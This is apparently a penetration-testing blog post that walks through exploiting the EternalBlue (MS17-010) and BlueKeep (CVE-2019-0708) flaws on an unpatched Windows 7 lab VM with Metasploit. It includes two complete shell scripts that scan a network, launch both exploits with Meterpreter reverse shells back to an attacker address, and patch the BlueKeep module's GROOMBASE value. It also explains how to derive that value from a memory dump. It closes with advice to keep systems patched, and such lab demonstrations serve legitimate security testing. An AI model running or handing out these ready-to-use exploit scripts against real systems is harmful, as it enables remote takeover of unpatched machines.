
Exploiting Bluekeep and Eternalblue vulnerabilities

Many companies still run legacy operating systems such as Windows 7 SP1 and Windows Server 2008 R2.

In this post we will see the risk companies are exposed to when they do not update their systems regularly.

For this post we will use a Windows 7 SP1 machine on which none of the following Microsoft security updates is installed:

  • KB4012212 – KB4012215 – KB4012218 – KB4015549 – KB4015552 (MS17-010 patch Eternalblue)
  • KB4499164 – KB4499175 (CVE-2019-0708 Bluekeep)

For the demo we will use the Metasploit Framework, which already ships exploit modules for both vulnerabilities; just bring Metasploit up to date with ‘apt update; apt install metasploit-framework‘. We will use Kali Linux as the attacker machine.

Exploiting Eternalblue vulnerability

In April 2017 a group calling itself the “Shadow Brokers” leaked a set of tools and exploits attributed to the NSA.

One of the leaked exploits was “EternalBlue”, which abuses a flaw in Microsoft’s implementation of the Server Message Block (SMB) protocol. The vulnerability, tracked as CVE-2017-0144, lies in the SMBv1 version of the protocol and allows unauthenticated remote code execution over TCP port 445.

Microsoft had already released a patch for it in March 2017 (MS17-010), but in May 2017 one of the biggest cybersecurity incidents ever, known as “WannaCry”, took place. It was ransomware that used this vulnerability to propagate itself, mainly across unpatched legacy systems (Windows XP, Windows Server 2003/2008, Windows 7, Windows 8.1) on which SMBv1 is enabled by default. Companies that had applied Microsoft’s patch in time were not affected by WannaCry, but patching in many companies lags months behind the release of an update.

Let’s see how an attacker can use Metasploit’s modules to take advantage of this vulnerability.

The first step, from the Metasploit console, is to use one of the auxiliary scanner modules to look for potentially vulnerable hosts on the local network. For this we use the module:

Now that we have found a possible victim (192.168.0.205), we run the exploit module with the following options:

As payload we have set a Meterpreter reverse TCP connection back to our attacker machine (192.168.0.202). After running the exploit we got a Meterpreter session:

As we can see, we now have NT AUTHORITY\SYSTEM privileges on the target machine:

So we have full control over the victim machine; as an example, here we create a simple PWNED.txt file:
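The scan-then-exploit sequence described above, packaged as a Metasploit resource script so it can be re-run unchanged; this is an added example, not the commands from the original post. The module names (auxiliary/scanner/smb/smb_ms17_010, exploit/windows/smb/ms17_010_eternalblue) and option names are Metasploit’s own; the network 192.168.0.0/24, the victim 192.168.0.205, the attacker 192.168.0.202, port 4444 and the `valid_ipv4` helper are assumptions made for this example.

```shell
#!/bin/sh
# Added example, not from the original post: drive the MS17-010 scan and the
# EternalBlue exploit from a Metasploit resource script instead of typing the
# commands interactively. Assumes Kali with msfconsole on the PATH.
set -eu

# valid_ipv4 ADDR[/PREFIX] -> 0 if ADDR is a dotted quad (optional /0-32 prefix).
# Guards against a typo scanning or exploiting the wrong network.
valid_ipv4() {
    ip=${1%%/*}
    case $1 in
        */*)
            prefix=${1#*/}
            case $prefix in ''|*[!0-9]*) return 1;; esac
            [ "$prefix" -le 32 ] || return 1
            ;;
    esac
    oldifs=$IFS; IFS=.
    set -- $ip
    IFS=$oldifs
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        case $octet in ''|*[!0-9]*) return 1;; esac
        [ "$octet" -le 255 ] || return 1
    done
}

# write_ms17_rc NET VICTIM LHOST -> prints the path of a resource script that
# 1) runs the MS17-010 checker against NET and 2) fires EternalBlue at VICTIM,
# catching a staged x64 Meterpreter reverse shell on LHOST:4444.
write_ms17_rc() {
    net=$1; victim=$2; lhost=$3
    valid_ipv4 "$net" && valid_ipv4 "$victim" && valid_ipv4 "$lhost" || return 1
    rc=${TMPDIR:-/tmp}/ms17_010.rc
    cat >"$rc" <<EOF
# Step 1: find hosts whose SMBv1 still answers like an unpatched system
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS $net
set THREADS 16
run
# Step 2: exploit one confirmed host
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $victim
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT 4444
exploit -z
# Step 3: confirm the session runs as NT AUTHORITY\\SYSTEM without interacting
sessions -C getuid
EOF
    printf '%s\n' "$rc"
}

# Usage: sh ms17_010.sh 192.168.0.0/24 192.168.0.205 192.168.0.202
if [ $# -eq 3 ]; then
    rc=$(write_ms17_rc "$@") || { echo "invalid IPv4 address or CIDR given" >&2; exit 1; }
    msfconsole -q -r "$rc"
fi
```

The scanner step is read-only, but the exploit grooms the kernel pool of the target and can blue-screen an unpatched host, so point it only at lab machines you own or are authorised to test.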

Exploiting Bluekeep vulnerability

This vulnerability, CVE-2019-0708, was disclosed in May 2019: a flaw in the RDP service that lets an unauthenticated attacker execute code remotely on a vulnerable machine, before any credentials are exchanged. It affects Windows 7, Windows Server 2008 and 2008 R2 and the out-of-support Windows XP and Windows Server 2003 (Windows 8 and later are not affected); Microsoft released patches on 14 May 2019, including for the out-of-support versions. Enabling Network Level Authentication (NLA) blocks unauthenticated exploitation, but it is a mitigation, not a substitute for the patch. However, the update policy of most companies is too slow, and there could be thousands of machines still vulnerable to this attack. This is even more frightening considering that Shodan shows almost 4 million devices with RDP exposed to the Internet:

As with EternalBlue, Metasploit has a scanner module to detect vulnerable machines on the local network:

Once again our victim machine (192.168.0.205) is vulnerable. The next step is to use the exploit module and set its options properly.

NOTE: As we can see in the exploit options, there is an option called “target”. The Metasploit module has 6 predefined target machines, and each of them has a GROOMBASE address hardcoded in the exploit source code: the start of the kernel non-paged pool, which the exploit needs so that its groomed objects land at a predictable address. A wrong GROOMBASE typically blue-screens the target instead of giving a shell. In our case we are running a VM on a Proxmox 5.4.5 virtual environment, so the exploit does not work with any of the predefined targets. We first have to find out the start address of the non-paged pool in our VM.

To get the start address of the non-paged pool we need a complete dump of the VM’s memory; for that we can use the following Microsoft tool:

NOTE: To enable a complete memory dump on crash we need to open the registry key “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl” and set the value “CrashDumpEnabled” to “0x1“ (1 = complete memory dump). A complete dump also requires a page file on the system drive at least as large as physical RAM plus 1 MB; otherwise the dump file is not written.

Once we have a complete memory dump of the machine, we can open the .dmp file in the Windows Debugger (windbg.exe) and use the following command to find the non-paged pool addresses:

As we can see, the start address is 0xfffffa8001807000. So finally we need to edit the exploit’s source code and change the GROOMBASE address of the target 1 entry:

Now we are ready to launch the exploit with the target 1 option:
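The GROOMBASE edit and the BlueKeep scan-and-exploit run described above, as a script; this is an added example, not the post’s own commands. Assumptions: Kali’s module path /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb; that target 0 (automatic fingerprinting) carries no GROOMBASE entry, so the Nth GROOMBASE line in the module’s target table belongs to target N; port 4444 and the network 192.168.0.0/24. The module names (auxiliary/scanner/rdp/cve_2019_0708_bluekeep, exploit/windows/rdp/cve_2019_0708_bluekeep_rce) are Metasploit’s own; the addresses 192.168.0.205, 192.168.0.202 and 0xfffffa8001807000 come from the post. The helper functions are written for this example.

```shell
#!/bin/sh
# Added example, not from the original post: patch the hardcoded GROOMBASE of
# one target in the BlueKeep module, then run the scanner and the exploit from a
# resource script. Assumptions: Kali's module path (MODULE below) and that the
# Nth GROOMBASE line of the module's target table belongs to target N (target 0,
# automatic fingerprinting, carries no GROOMBASE).
set -eu

MODULE=${MODULE:-/usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb}

# valid_groombase ADDR -> 0 if ADDR is a 0x-prefixed, 16-digit x64 kernel address.
# Anything else almost certainly blue-screens the target instead of giving a shell.
valid_groombase() {
    hex=${1#0x}
    [ "$hex" != "$1" ] || return 1                   # no 0x prefix
    case $hex in ''|*[!0-9a-fA-F]*) return 1;; esac  # not hexadecimal
    [ ${#hex} -eq 16 ] || return 1                   # not a 64-bit address
}

# set_groombase FILE N ADDR -> rewrites the hex literal on the Nth GROOMBASE line
# of FILE, keeping a backup as FILE.orig (Metasploit only loads *.rb, so the
# backup is ignored). Fails if FILE has fewer than N GROOMBASE lines. Prints the
# rewritten line so the change can be checked by eye.
set_groombase() {
    file=$1; n=$2; addr=$3
    valid_groombase "$addr" || return 1
    [ -f "$file.orig" ] || cp "$file" "$file.orig"
    awk -v n="$n" -v addr="$addr" '
        /GROOMBASE/ { if (++seen == n) { sub(/0x[0-9a-fA-F]+/, addr); hit = 1 } }
        { print }
        END { if (!hit) exit 1 }
    ' "$file" >"$file.tmp" || { rm -f "$file.tmp"; return 1; }
    mv "$file.tmp" "$file"
    awk -v n="$n" '/GROOMBASE/ && ++seen == n' "$file"
}

# write_bluekeep_rc NET VICTIM LHOST TARGET -> prints the path of a resource
# script that scans NET, then exploits VICTIM with the given target index and
# catches a staged x64 Meterpreter reverse shell on LHOST:4444.
write_bluekeep_rc() {
    net=$1; victim=$2; lhost=$3; target=$4
    rc=${TMPDIR:-/tmp}/bluekeep.rc
    cat >"$rc" <<EOF
# Step 1: find hosts that still accept the vulnerable pre-authentication RDP sequence
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS $net
run
# Step 2: exploit with the target whose GROOMBASE matches this VM's non-paged pool
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS $victim
set target $target
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT 4444
exploit -z
sessions -C getuid
EOF
    printf '%s\n' "$rc"
}

# Usage: sh bluekeep.sh 0xfffffa8001807000 192.168.0.0/24 192.168.0.205 192.168.0.202
# Patches target 1 with the address read from the memory dump, then runs it.
if [ $# -eq 4 ]; then
    set_groombase "$MODULE" 1 "$1"
    rc=$(write_bluekeep_rc "$2" "$3" "$4" 1)
    msfconsole -q -r "$rc"
fi
```

Run it only against a VM you own: with a GROOMBASE that does not match the target’s non-paged pool the exploit crashes the machine rather than failing cleanly. The edit lives in the packaged module file, so the next `apt upgrade` of metasploit-framework overwrites it; keep the FILE.orig backup and re-apply the change afterwards.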

And that’s all 🙂

Hope you find this post useful, and always keep your OS up to date.
